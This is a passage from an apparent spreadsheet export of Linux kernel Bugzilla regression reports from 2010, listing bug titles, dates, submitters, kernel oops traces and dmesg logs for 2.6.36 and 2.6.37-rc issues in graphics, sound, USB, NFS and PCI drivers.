ffff88021c5b4000, task ffff88021c6cc3b0) [ 473.681013] Stack: [ 473.681015] 0000000000000059 0000000000000000 ffff88021d0d9000 ffff8802276b2000 [ 473.681020] ffff88021c5b5ea8 ffffffffa01da8a7 ffff880200000059 000000000000e200 [ 473.681640] ffff880200000001 0000000000005f33 ffff88021c5b5df8 ffffffffa02ce678 [ 473.681903] Call Trace: [ 473.681966] [&lt;ffffffffa01da8a7&gt;] drm_ioctl+0x3c7/0x460 [drm] [ 473.681973] [&lt;ffffffffa0291950&gt;] ? i915_gem_entervt_ioctl+0x0/0x1e0 [i915] [ 473.682184] [&lt;ffffffff81128e91&gt;] ? do_sync_write+0xd1/0x120 [ 473.682188] [&lt;ffffffff8115ee6d&gt;] ? fsnotify+0x11d/0x2f0 [ 473.682191] [&lt;ffffffff81139671&gt;] do_vfs_ioctl+0xb1/0x6d0 [ 473.682194] [&lt;ffffffff81139d29&gt;] sys_ioctl+0x99/0xa0 [ 473.682454] [&lt;ffffffff811295d0&gt;] ? sys_write+0x50/0x90 [ 473.682458] [&lt;ffffffff8100b002&gt;] system_call_fastpath+0x16/0x1b [ 473.682460] Code: 1f 40 00 0f 0b eb fe 0f 1f 40 00 0f 0b eb fe 0f 1f 40 00 0f 0b eb fe 0f 1f 40 00 0f 0b eb fe 0f 1f 40 00 0f 0b eb fe 0f 1f 40 00 &lt;0f&gt; 0b eb fe 0f 1f 40 00 55 48 89 e5 48 83 ec 30 48 89 5d d8 4c [ 473.684006] RIP [&lt;ffffffffa0291b28&gt;] i915_gem_entervt_ioctl+0x1d8/0x1e0 [i915] [ 473.684006] RSP &lt;ffff88021c5b5d68&gt; [ 473.687993] ---[ end trace 95914a5179441380 ]--- Full dmesg and Xorg.log.0 will be attached.</t>
  </si>
  <si>
    <t>(2.6.37-rc1) amd64-agp module crashed on second load</t>
  </si>
  <si>
    <t>2010-11-14 19:38 UTC</t>
  </si>
  <si>
    <t>2012-08-14 15:14 UTC</t>
  </si>
  <si>
    <t>Subject : (2.6.37-rc1) amd64-agp module crashed on second load Submitter : Randy Dunlap &lt;randy.dunlap@oracle.com&gt; Date : 2010-11-05 0:13 Message-ID : 20101104171333.fea1f498.randy.dunlap@oracle.com References : http://marc.info/?l=linux-kernel&amp;m=128891605213447&amp;w=2 This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[BUG]: skge not working (as module) in 2.6.37-rc1</t>
  </si>
  <si>
    <t>2010-11-14 19:44 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG]: skge not working (as module) in 2.6.37-rc1 Submitter : Marin Mitov &lt;mitov@issp.bas.bg&gt; Date : 2010-11-07 21:45 Message-ID : 201011072345.52784.mitov@issp.bas.bg References : http://marc.info/?l=linux-kernel&amp;m=128916643110423&amp;w=2 This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.36: kernel panic in cascade (Fatal exception in interrupt)</t>
  </si>
  <si>
    <t>2010-11-14 20:13 UTC</t>
  </si>
  <si>
    <t>2010-11-18 23:40 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.36: kernel panic in cascade (Fatal exception in interrupt) Submitter : Thomas Meyer &lt;thomas@m3y3r.de&gt; Date : http://marc.info/?l=linux-kernel&amp;m=128882381406884&amp;w=2 Message-ID : 201011032334.30662.thomas@m3y3r.de References : http://marc.info/?l=linux-kernel&amp;m=128882381406884&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[REGRESSION] [2.6.37-rc1] Fan noise after suspend to ram/disk</t>
  </si>
  <si>
    <t>2010-11-14 20:16 UTC</t>
  </si>
  <si>
    <t>2010-12-17 19:40 UTC</t>
  </si>
  <si>
    <t>Subject : [REGRESSION] [2.6.37-rc1] Fan noise after suspend to ram/disk Submitter : Maciej Rutecki &lt;maciej.rutecki@gmail.com&gt; Date : 2010-11-04 16:06 Message-ID : 201011041706.59046.maciej.rutecki@gmail.com References : http://marc.info/?l=linux-kernel&amp;m=128888684308982&amp;w=2 This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>building (e)glibc against 2.6.37-rc1 headers fails</t>
  </si>
  <si>
    <t>2010-11-15 00:09 UTC</t>
  </si>
  <si>
    <t>stephan</t>
  </si>
  <si>
    <t>2010-12-02 21:19 UTC</t>
  </si>
  <si>
    <t>Vaio laptop reboots instead of resuming after suspending to RAM with kernels &gt;= 2.6.35</t>
  </si>
  <si>
    <t>2.6.35, 2.6.36</t>
  </si>
  <si>
    <t>2010-11-16 05:52 UTC</t>
  </si>
  <si>
    <t>Adriano</t>
  </si>
  <si>
    <t>2010-12-25 02:40 UTC</t>
  </si>
  <si>
    <t>This happens on a Vaio VGN-NW130D laptop running Debian testing. Resuming from suspend works fine under kernels up to 2.6.34, but I get a full restart (most of the time, not always) under 2.6.35 and 2.6.36. I don't use any proprietary drivers, but I do have the Debian package firmware-linux-nonfree installed. How could I help trace the problem? Thank you, Adriano</t>
  </si>
  <si>
    <t>ftdi_sio /dev/ttyUSB error:  "Resource Temporarily Unavailable"</t>
  </si>
  <si>
    <t>2010-11-16 06:25 UTC</t>
  </si>
  <si>
    <t>Kevin Smith</t>
  </si>
  <si>
    <t>2011-01-27 16:49 UTC</t>
  </si>
  <si>
    <t>I am using a ftdi USB-to-serial device, which has worked in previous kernels. After a recent update to mainline 2.6.37, I am no longer able to access the device. Upon plugging in the device, the ftdi_sio module loads and /dev/ttyUSB0 appears. However, when I try to access the device, I get the error "Resource Temporarily Unavailable". There is no other process trying to access the device. After downgrading to 2.6.36, the problem is fixed.</t>
  </si>
  <si>
    <t>kvm segfaults on 2.6.36-64bit kernel with 32 bit userspace</t>
  </si>
  <si>
    <t>2010-11-17 11:59 UTC</t>
  </si>
  <si>
    <t>Jorge Boncompte</t>
  </si>
  <si>
    <t>2010-11-21 23:10 UTC</t>
  </si>
  <si>
    <t>qemu-kvm 0.12.5 and 0.13.0 from debian and compiled from sources segfaults for me on a vanilla 2.6.36 64bit kernel and debian squeeze 32bit userspace. Doing a bisection resulted on commit 9581d442b905 (KVM: Fix fs/gs reload oops with invalid ldt), reverting it fixes the problem and survived a new debian-amd64 install. Regards, Jorge</t>
  </si>
  <si>
    <t>[bisected] i915 regression in post 2.6.36 kernels</t>
  </si>
  <si>
    <t>2010-11-17 18:16 UTC</t>
  </si>
  <si>
    <t>2011-02-02 23:44 UTC</t>
  </si>
  <si>
    <t>Subject : [bisected] i915 regression in post 2.6.36 kernels Submitter : Johannes Hirte &lt;johannes.hirte@fem.tu-ilmenau.de&gt; Date : 2010-11-10 7:02 Message-ID : 201011100802.20332.johannes.hirte@fem.tu-ilmenau.de References : http://marc.info/?l=linux-kernel&amp;m=128937310017057&amp;w=2 This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>without "pci=nocrs", Dell Inspiron 1545 hangs</t>
  </si>
  <si>
    <t>2.6.37-rc2</t>
  </si>
  <si>
    <t>2010-11-17 19:18 UTC</t>
  </si>
  <si>
    <t>2010-12-19 12:13 UTC</t>
  </si>
  <si>
    <t>Created attachment 37352 [details] 2.6.36 dmesg log [From email:] Commit dc9887dc ("x86/PCI: allocate space from the end of a region, not the beginning") causes the kernel to hang on my Dell Inspiron 1545. 2.6.36 and booting with pci=nocrs works fine. Reverting this commit also works. I am attaching the kernel log and system iomem from the working 2.6.36. It hangs at this location consistently: pci-stub: invalid id string "" ACPI: AC Adapter [AC] (on-line) input: Lid Switch as /devices/LNXSYSTM:00/LNXSYBUS:00/PNP0C0D:00/input/input0 &lt;hang&gt; Attached dmesg log is from 2.6.36.</t>
  </si>
  <si>
    <t>autofs4 hang in 2.6.37-rc1</t>
  </si>
  <si>
    <t>2010-11-17 19:24 UTC</t>
  </si>
  <si>
    <t>2010-12-19 11:55 UTC</t>
  </si>
  <si>
    <t>Ian Kent</t>
  </si>
  <si>
    <t>Subject : autofs4 hang in 2.6.37-rc1 Submitter : Avi Kivity &lt;avi@redhat.com&gt; Date : 2010-11-14 12:55 Message-ID : 4CDFDC2B.6040205@redhat.com References : http://marc.info/?l=linux-kernel&amp;m=128973936026185&amp;w=2 This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>ALSA no longer detects digital microphone on snd_hda_intel</t>
  </si>
  <si>
    <t>2010-11-18 05:27 UTC</t>
  </si>
  <si>
    <t>2011-02-09 16:06 UTC</t>
  </si>
  <si>
    <t>Created attachment 37382 [details] alsa-info.sh output on 2.6.37-rc2 I'm running Ubuntu 10.10 on a Dell XPS 1530 with an HDA Intel sound card. Kernel 2.6.36 supplies microphones Digital, Mic, and Front Mic to alsamixer. Selecting Digital on the leftmost input source on the capture tab allows recording from the PC's built-in microphone. This corresponds to selecting Microphone 1 in gnome-volume-control. However, kernel 2.6.37-rc2 supplies only Mic and Internal to alsamixer, neither of which is the internal microphone. So it is no longer possible to record using 2.6.37-rc2. One difference that stands out in the alsa-info logs is that amixer and alsactl detect the input sources with different item properties/names (full logs attached separately): 2.6.37-rc2: Simple mixer control 'Input Source',0 Capabilities: cenum Items: 'Internal Mic' 'Mic' 'Internal Mic 1' Item0: 'Internal Mic' Simple mixer control 'Input Source',1 Capabilities: cenum Items: 'Internal Mic' 'Mic' 'Internal Mic 1' Item0: 'Mic' Simple mixer control 'Input Source',2 Capabilities: cenum Items: 'Internal Mic' 'Mic' 'Internal Mic 1' Item0: 'Mic' 2.6.36: Simple mixer control 'Input Source',0 Capabilities: cenum Items: 'Mic' 'Front Mic' 'Digital Mic' Item0: 'Digital Mic' Simple mixer control 'Input Source',1 Capabilities: cenum Items: 'Mic' 'Front Mic' 'Digital Mic' Item0: 'Mic' Simple mixer control 'Input Source',2 Capabilities: cenum Items: 'Mic' 'Front Mic' 'Digital Mic' Item0: 'Mic'</t>
  </si>
  <si>
    <t>BUG: unable to handle kernel NULL pointer dereference at (null)</t>
  </si>
  <si>
    <t>2010-11-18 07:05 UTC</t>
  </si>
  <si>
    <t>James Tan</t>
  </si>
  <si>
    <t>2011-01-25 14:36 UTC</t>
  </si>
  <si>
    <t>Managed to get a dmesg from 2.6.36 due to time constraint. Not observed in 2.6.34. Reproduced by building kernel + glxgears + other applications. Previously always reproducible when launching (powering up) a virtual machine from VM. Suspect high disk I/O related, but not sure. Screen, keyboard and mouse freezes. Only able to SSH in from remote pc. full dmesg here: http://pastebin.com/qbPC9MrT [ 431.047729] BUG: unable to handle kernel NULL pointer dereference at (null) [ 431.047736] IP: [&lt;(null)&gt;] (null) [ 431.047740] *pdpt = 00000000222ea001 *pde = 0000000000000000 [ 431.047743] Oops: 0010 [#1] PREEMPT SMP [ 431.047747] last sysfs file: /sys/devices/system/cpu/cpu0/cpufreq/scaling_cur_freq [ 431.047751] Modules linked in: wacom ipt_MASQUERADE iptable_nat nf_nat nf_conntrack_ipv4 nf_conntrack nf_defrag_ipv4 ip_tables x_tables vmnet vmblock vsock vmci vmmon coretemp firewire_sbp2 joydev arc4 ecb psmouse serio_raw firewire_ohci firewire_core crc_itu_t snd_hda_codec_analog pcmcia snd_hda_intel snd_hda_codec ohci1394 snd_hwdep ieee1394 yenta_socket pcmcia_rsrc pcmcia_core snd_pcm_oss snd_mixer_oss iwl3945 snd_pcm pcspkr snd_seq_dummy iwlcore snd_seq_oss mac80211 tg3 libphy cfg80211 snd_seq_midi tpm_infineon snd_rawmidi snd_seq_midi_event snd_seq snd_timer snd_seq_device btusb snd soundcore snd_page_alloc evdev [ 431.047789] [ 431.047793] Pid: 10803, comm: glxgears Not tainted 2.6.36.11182010-2 #3 30C0/HP Compaq 6510b (KS284PA#UUF) [ 431.047796] EIP: 0060:[&lt;00000000&gt;] EFLAGS: 00210206 CPU: 0 [ 431.047799] EIP is at 0x0 [ 431.047801] EAX: f6c0b800 EBX: 00000000 ECX: f75fc014 EDX: f75fc014 [ 431.047803] ESI: 00000000 EDI: 00000002 EBP: dd20feac ESP: dd20fe44 [ 431.047806] DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068 [ 431.047808] Process glxgears (pid: 10803, ti=dd20e000 task=e2073440 task.ti=dd20e000) [ 431.047810] Stack: [ 431.047811] c03188c4 c02fa66c 00000002 f6c0b800 f75fc000 f6c0b814 f8489898 00000000 [ 431.047816] &lt;0&gt; f5d90a00 00000000 00000000 00000001 00000002 00000018 c0671974 0000004b [ 431.047821] &lt;0&gt; dd0e7940 c02ecbaf dd20feac 00000001 bfeb6744 4018644b f6c0b800 c02fa2ed [ 431.047826] Call Trace: [ 431.047832] [&lt;c03188c4&gt;] ? intel_ring_advance+0xe/0xf [ 431.047836] [&lt;c02fa66c&gt;] ? i915_cmdbuffer+0x37f/0x416 [ 431.047843] [&lt;c02ecbaf&gt;] ? drm_ioctl+0x245/0x2e5 [ 431.047845] [&lt;c02fa2ed&gt;] ? i915_cmdbuffer+0x0/0x416 [ 431.047850] [&lt;c01864a4&gt;] ? do_wp_page+0x6e3/0x77f [ 431.047853] [&lt;c0187eb2&gt;] ? handle_mm_fault+0x9d7/0xa72 [ 431.047856] [&lt;c02ec96a&gt;] ? drm_ioctl+0x0/0x2e5 [ 431.047859] [&lt;c01ad95a&gt;] ? do_vfs_ioctl+0x489/0x4cb [ 431.047863] [&lt;c049bb6d&gt;] ? do_page_fault+0x223/0x286 [ 431.047865] [&lt;c01ad9dd&gt;] ? sys_ioctl+0x41/0x58 [ 431.047869] [&lt;c0102893&gt;] ? sysenter_do_call+0x12/0x22 [ 431.047871] Code: Bad EIP value. [ 431.047874] EIP: [&lt;00000000&gt;] 0x0 SS:ESP 0068:dd20fe44 [ 431.047880] CR2: 0000000000000000 [ 431.047882] ---[ end trace 8526e8579e498514 ]---</t>
  </si>
  <si>
    <t>Endless and reasonless kernel complain at __pm_runtime_resume()</t>
  </si>
  <si>
    <t>2010-11-18 10:32 UTC</t>
  </si>
  <si>
    <t>Ivan Baidakou</t>
  </si>
  <si>
    <t>2011-05-30 10:55 UTC</t>
  </si>
  <si>
    <t>I do boot up my linux box (please note, I do not resume) and I see the following: Nov 18 11:53:51 localhost kernel: ehci_hcd 0000:00:13.2: EHCI Host Controller Nov 18 11:53:51 localhost kernel: ehci_hcd 0000:00:13.2: new USB bus registered, assigned bus number 2 Nov 18 11:53:51 localhost kernel: ehci_hcd 0000:00:13.2: debug port 1 Nov 18 11:53:51 localhost kernel: ehci_hcd 0000:00:13.2: irq 17, io mem 0xdc606400 Nov 18 11:53:51 localhost kernel: ehci_hcd 0000:00:13.2: USB 2.0 started, EHCI 1.00 Nov 18 11:53:51 localhost kernel: PM: Adding info for usb:usb2 Nov 18 11:53:51 localhost kernel: PM: Adding info for usb:2-0:1.0 Nov 18 11:53:51 localhost kernel: hub 2-0:1.0: USB hub found Nov 18 11:53:51 localhost kernel: hub 2-0:1.0: 5 ports detected Nov 18 11:53:51 localhost kernel: PM: Adding info for No Bus:ep_81 Nov 18 11:53:51 localhost kernel: PM: Adding info for No Bus:usbdev2.1 Nov 18 11:53:51 localhost kernel: PM: Adding info for No Bus:ep_00 Nov 18 11:53:51 localhost kernel: ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver Nov 18 11:53:51 localhost kernel: ohci_hcd 0000:00:12.0: PCI INT A -&gt; GSI 18 (level, low) -&gt; IRQ 18 Nov 18 11:53:51 localhost kernel: ohci_hcd 0000:00:12.0: OHCI Host Controller Nov 18 11:53:51 localhost kernel: ohci_hcd 0000:00:12.0: new USB bus registered, assigned bus number 3 Nov 18 11:53:51 localhost kernel: ohci_hcd 0000:00:12.0: irq 18, io mem 0xdc404000 Nov 18 11:53:51 localhost kernel: PM: Adding info for usb:usb3 Nov 18 11:53:51 localhost kernel: PM: Adding info for usb:3-0:1.0 Nov 18 11:53:51 localhost kernel: hub 3-0:1.0: USB hub found Nov 18 11:53:51 localhost kernel: hub 3-0:1.0: 5 ports detected Nov 18 11:53:51 localhost kernel: PM: Adding info for No Bus:ep_81 Nov 18 11:53:51 localhost kernel: PM: Adding info for No Bus:usbdev3.1 Nov 18 11:53:51 localhost kernel: PM: Adding info for No Bus:ep_00 Nov 18 11:53:51 localhost kernel: ohci_hcd 0000:00:13.0: PCI INT A -&gt; GSI 18 (level, low) -&gt; IRQ 18 Nov 18 11:53:51 localhost kernel: ohci_hcd 0000:00:13.0: OHCI Host Controller Nov 18 11:53:51 localhost kernel: scsi host3: __pm_runtime_suspend()! Nov 18 11:53:51 localhost kernel: scsi host3: __pm_runtime_suspend() returns 0! Nov 18 11:53:51 localhost kernel: scsi host2: __pm_runtime_suspend()! Nov 18 11:53:51 localhost kernel: scsi host2: __pm_runtime_suspend() returns 0! Nov 18 11:53:51 localhost kernel: scsi 0:0:0:0: Direct-Access ATA TOSHIBA MK1665GS GJ00 PQ: 0 ANSI: 5 Nov 18 11:53:51 localhost kernel: PM: Adding info for scsi:target0:0:0 Nov 18 11:53:51 localhost kernel: scsi target0:0:0: __pm_runtime_resume()! Nov 18 11:53:51 localhost kernel: scsi target0:0:0: __pm_runtime_resume() returns 1! Nov 18 11:53:51 localhost kernel: scsi 0:0:0:0: __pm_runtime_resume()! Nov 18 11:53:51 localhost kernel: scsi 0:0:0:0: __pm_runtime_resume() returns 1! Nov 18 11:53:51 localhost kernel: scsi 0:0:0:0: __pm_runtime_resume()! Nov 18 11:53:51 localhost kernel: scsi 0:0:0:0: __pm_runtime_resume() returns 1! Nov 18 11:53:51 localhost kernel: PM: Adding info for scsi:0:0:0:0 Nov 18 11:53:51 localhost kernel: PM: Adding info for No Bus:0:0:0:0 Nov 18 11:53:51 localhost kernel: PM: Adding info for No Bus:0:0:0:0 Nov 18 11:53:51 localhost kernel: sd 0:0:0:0: [sda] 312581808 512-byte logical blocks: (160 GB/149 GiB) Nov 18 11:53:51 localhost kernel: sd 0:0:0:0: [sda] Write Protect is off Nov 18 11:53:51 localhost kernel: PM: Adding info for No Bus:0:0:0:0 Nov 18 11:53:51 localhost kernel: sd 0:0:0:0: [sda] Mode Sense: 00 3a 00 00 Nov 18 11:53:51 localhost kernel: sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA Nov 18 11:53:51 localhost kernel: scsi target1:0:0: __pm_runtime_resume()! Nov 18 11:53:51 localhost kernel: scsi target1:0:0: __pm_runtime_resume() returns -11! Nov 18 11:53:54 localhost kernel: sd 0:0:0:0: __pm_runtime_resume()! Nov 18 11:53:54 localhost kernel: sd 0:0:0:0: __pm_runtime_resume() returns 1! Nov 18 11:53:54 localhost kernel: sd 0:0:0:0: __pm_runtime_resume()! Nov 18 11:53:54 localhost kernel: sd 0:0:0:0: __pm_runtime_resume() returns 1! Nov 18 11:53:54 localhost kernel: scsi host1: __pm_runtime_resume()! Nov 18 11:53:54 localhost kernel: scsi host1: __pm_runtime_resume() returns 1! Nov 18 11:53:54 localhost kernel: scsi host1: __pm_runtime_resume()! Nov 18 11:53:54 localhost kernel: scsi host1: __pm_runtime_resume() returns 1! Nov 18 11:53:54 localhost kernel: scsi host1: __pm_runtime_resume()! Nov 18 11:53:54 localhost kernel: scsi host1: __pm_runtime_resume() returns 1! Nov 18 11:53:54 localhost kernel: scsi host1: __pm_runtime_resume()! Nov 18 11:53:54 localhost kernel: scsi host1: __pm_runtime_resume() returns 1! Nov 18 11:53:54 localhost kernel: scsi host1: __pm_runtime_resume()! Nov 18 11:53:54 localhost kernel: scsi host1: __pm_runtime_resume() returns 1! the last message repeats endlessly! # uname -a Linux logos 2.6.36 #1 PREEMPT Thu Nov 18 11:52:17 EET 2010 x86_64 AMD V120 Processor AuthenticAMD GNU/Linux</t>
  </si>
  <si>
    <t>2.6.36 radeon KMS: [drm] Cannot find any crtc or sizes</t>
  </si>
  <si>
    <t>2010-11-18 15:33 UTC</t>
  </si>
  <si>
    <t>Ján Bednár</t>
  </si>
  <si>
    <t>2010-12-05 19:50 UTC</t>
  </si>
  <si>
    <t>Created attachment 37562 [details] kernel config After upgrade from 2.6.35 to 2.6.36 I think I have found a regression. 2.6.36 is booting fine until kernel tries to change resolution. Then my monitor just goes blank, but the booting process continues. Using ssh I'm able to connect to my computer and there are following messages in my dmesg: [ 4.650041] No connectors reported connected with modes [ 4.650046] [drm] Cannot find any crtc or sizes - going 1024x768 My configuration: onboard graphic card: ATI Technologies Inc RS482 [Radeon Xpress 200] with both VGA and DVI ports monitor: Samsung SyncMaster 204B Please note that this only happens when my monitor is connected with DVI. After switching to standard VGA cable everything works just fine.</t>
  </si>
  <si>
    <t>DisplayPort no longer working after patch</t>
  </si>
  <si>
    <t>2010-11-19 23:40 UTC</t>
  </si>
  <si>
    <t>Kjell Rune Skaaraas</t>
  </si>
  <si>
    <t>2010-12-02 21:21 UTC</t>
  </si>
  <si>
    <t>With a Radeon HD5850 on the open source radeon drivers my DisplayPort monitor stopped working between rc1 and rc2. The card is reported as having only three outputs now, HDMI and 2xDVI. I did a bisect and the cause is this commit: 2236baa75f704851d3cd3310569058151acb1f06 is the first bad commit commit 2236baa75f704851d3cd3310569058151acb1f06 Author: Jean Delvare &lt;khali@linux-fr.org&gt; Date: Mon Nov 15 22:40:38 2010 +0100 i2c: Sanity checks on adapter registration Make sure I2C adapters being registered have the required struct fields set. If they don't, problems will happen later. Signed-off-by: Jean Delvare &lt;khali@linux-fr.org&gt; :040000 040000 d56136ee874424d0d5e11a6483ea1f393b35edb8 0cf1eaab8f5fd4a1b1786e7c745cb709ade50c28 M drivers I don't know what "problems" will happen later, I have not noticed any problems except it's sometimes a bit hard to make it wake after sleeping. Let me know what more details you need. Regards, Kjell Rune</t>
  </si>
  <si>
    <t>Boot failure on HP nx6325</t>
  </si>
  <si>
    <t>2010-11-20 00:57 UTC</t>
  </si>
  <si>
    <t>2010-12-19 11:32 UTC</t>
  </si>
  <si>
    <t>My HP nx6325 doesn't boot any more with 2.6.37-rc2 and later. It boots normally with 2.6.36 with analogous .config. The last thing printed by the kernel is that the TSC is unstable with an insanely huge delta. Later it only displays vertical stripes and hangs hard, but I don't really think the problem is related to the radeon driver, because it's still reproducible with radeon.modeset=0. I'll try to bisect this over the weekend.</t>
  </si>
  <si>
    <t>Fedora 14 init process interferes with computer shutdown process causing HDD to spin up on shutdown</t>
  </si>
  <si>
    <t>P5 low</t>
  </si>
  <si>
    <t>2010-11-20 13:32 UTC</t>
  </si>
  <si>
    <t>2011-05-09 21:22 UTC</t>
  </si>
  <si>
    <t>Recently I've started noticing that kernel does some very unpleasant and crucial things to my HDD when I'm powering off my Linux. While Windows simply powers off the HDD (together) with the rest of my PC, Linux instead makes HDD spindles stop, then my HDD tries to spin up again, then the power is finally retracted *when* my HDD has just started rotating again. The Linux poweroff sequence produces terribly unpleasant sounds. It's killing me. I will now try to alter the poweroff sequence calling: # sync # /sbin/hdparm -Y /dev/sda # halt -n -p -w (don't sync, we've done it earlier) instead of # halt -p -w I'm not sure Linux won't try to interfere with my way of powering off my HDD :(</t>
  </si>
  <si>
    <t>Graphical glitches on GM965 since 2.6.37-rc1</t>
  </si>
  <si>
    <t>2010-11-20 18:06 UTC</t>
  </si>
  <si>
    <t>2010-12-02 21:38 UTC</t>
  </si>
  <si>
    <t>Since 2.6.37-rc1, I see graphical glitches on various UI widgets. This can show as any of the following: - a black rectangle around the URL bar in Firefox - slightly glitchy scrollbars in various programs (most noticeably Konsole) - a lot of graphical corruption occasionally covers the document list and toolbar in Kate None of these effects are always there. They come and go. Overall, KDE applications seem to be more affected, and the problem is only severe with Compiz running. Without Compiz, the glitches are rarer and less obvious. Stability seems unaffected by the glitches, and 3D works without problems or glitches. This problem doesn't exist with 2.6.36. Observed on both Ubuntu Maverick and Ubuntu Natty (with xf86-video-intel 2.13.0-1ubuntu1) with a 2.6.37-rc1 kernel. On Natty, I verified that this bug is still present on a mainline kernel with the 2010-11-19 drm-intel-fixes merge. System info provided by apport is available in the downstream bug I filed.</t>
  </si>
  <si>
    <t>IdeaPAD \_SB_.DECN method failed 5. Is this an IdeaPAD? - Ideapad Y530</t>
  </si>
  <si>
    <t>2010-11-20 19:50 UTC</t>
  </si>
  <si>
    <t>ria.freelander</t>
  </si>
  <si>
    <t>2012-06-14 17:36 UTC</t>
  </si>
  <si>
    <t>drivers_platform_x86@kernel-bugs.osdl.org</t>
  </si>
  <si>
    <t>Created attachment 37762 [details] dmesg from y530 running Arch with kernel 2.6.36 ideapad-acpi (and ideapad-laptop from 2.6.37-rc2) not recognize ideapad y530 as Ideapad and BT killswitch cannot controlled (and some buttons does not work). dmesg attached.</t>
  </si>
  <si>
    <t>5ada28bf76752 causes compilation error if !CONFIG_LEDS_CLASS</t>
  </si>
  <si>
    <t>2010-11-21 16:26 UTC</t>
  </si>
  <si>
    <t>2010-12-19 11:56 UTC</t>
  </si>
  <si>
    <t>Subject : 5ada28bf76752 causes compilation error if !CONFIG_LEDS_CLASS Submitter : Michal Hocko &lt;mhocko@suse.cz&gt; Date : 2010-11-16 14:20 Message-ID : 20101116142027.GC19247@tiehlicka.suse.cz References : http://marc.info/?l=linux-kernel&amp;m=128991726220668&amp;w=2 This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>DVI/EDID broken with Intel i945 graphics and 2.6.37-rc2</t>
  </si>
  <si>
    <t>2010-11-21 16:32 UTC</t>
  </si>
  <si>
    <t>2010-12-03 22:06 UTC</t>
  </si>
  <si>
    <t>Subject : DVI/EDID broken with Intel i945 graphics and 2.6.37-rc2 Submitter : Tino Keitel &lt;tino.keitel@tikei.de&gt; Date : 2010-11-16 18:49 Message-ID : 20101116184914.GA15794@mac.home References : http://marc.info/?l=linux-kernel&amp;m=128993389113001&amp;w=2 This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.37-rc2 vs. 2.6.36 laptop backlight changes?</t>
  </si>
  <si>
    <t>2010-11-21 16:49 UTC</t>
  </si>
  <si>
    <t>2011-03-09 17:49 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.37-rc2 vs. 2.6.36 laptop backlight changes? Submitter : Patrick Schaaf &lt;netdev@bof.de&gt; Date : 2010-11-17 13:41 Message-ID : 1290001262.5727.2.camel@lat1 References : http://marc.info/?l=linux-kernel&amp;m=129000127920912&amp;w=2 This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Regression: DisplayPort stops working between 2.6.37-rc1 and rc2</t>
  </si>
  <si>
    <t>2010-11-21 16:58 UTC</t>
  </si>
  <si>
    <t>2010-11-22 21:17 UTC</t>
  </si>
  <si>
    <t>Subject : Regression: DisplayPort stops working between 2.6.37-rc1 and rc2 Submitter : Kjell Rune Skaaraas &lt;kjella79@yahoo.no&gt; Date : 2010-11-17 16:45 Message-ID : 452269.51735.qm@web27103.mail.ukl.yahoo.com References : http://marc.info/?l=linux-kernel&amp;m=129001236904228&amp;w=2 This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>HP 2530p accelerated graphics causes spontaneous power off/on</t>
  </si>
  <si>
    <t>2010-11-22 17:12 UTC</t>
  </si>
  <si>
    <t>2010-12-19 11:41 UTC</t>
  </si>
  <si>
    <t>Created attachment 37872 [details] dmesg diff (-good, +bad) Matthew Garrett reports that my _CRS patches break the 2530p: Once it starts doing accelerated operations there's a high probability that it'll suddenly display garbage all over the screen, suddenly power down and power back on after a few seconds Matthew found this in Fedora, introduced between these two kernel versions: -Linux version 2.6.36-4.fc13.x86_64 (mjg59@ihatethathostname.lab.bos.redhat.com) (gcc version 4.4.4 20100630 (Red Hat 4.4.4-10) (GCC) ) #1 SMP Tue Nov 16 17:41:39 EST 2010 +Linux version 2.6.36-4.fc15.x86_64 (mockbuild@x86-19.phx2.fedoraproject.org) (gcc version 4.5.1 20101112 (Red Hat 4.5.1-5) (GCC) ) #1 SMP Tue Nov 16 07:31:02 UTC 2010 I reported this against 2.6.37-rc1 because I think it's probably caused by commit 1af3c2e45, which appeared in .37-rc1 but was probably backported to fc15.</t>
  </si>
  <si>
    <t>NFS readdir change break fully cached nfs root</t>
  </si>
  <si>
    <t>2010-11-22 22:40 UTC</t>
  </si>
  <si>
    <t>2010-11-22 22:55 UTC</t>
  </si>
  <si>
    <t>Subject : [regression] NFS readdir change break fully cached nfs root Submitter : Andi Kleen &lt;andi@firstfloor.org&gt; Date : 2010-11-02 19:00 Message-ID : Message-ID: &lt;20101102180051.GA26089@basil.fritz.box&gt; References : http://permalink.gmane.org/gmane.linux.nfs/36540 Handled-By : Trond Myklebust &lt;Trond.Myklebust@netapp.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=128888689009058&amp;w=4 This entry is being used for tracking a regression from 2.6.. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Radeon tries to execute atombios on a card powered off by vgaswitcheroo</t>
  </si>
  <si>
    <t>2.6.34+</t>
  </si>
  <si>
    <t>2010-11-23 00:22 UTC</t>
  </si>
  <si>
    <t>Javier S. Pedro</t>
  </si>
  <si>
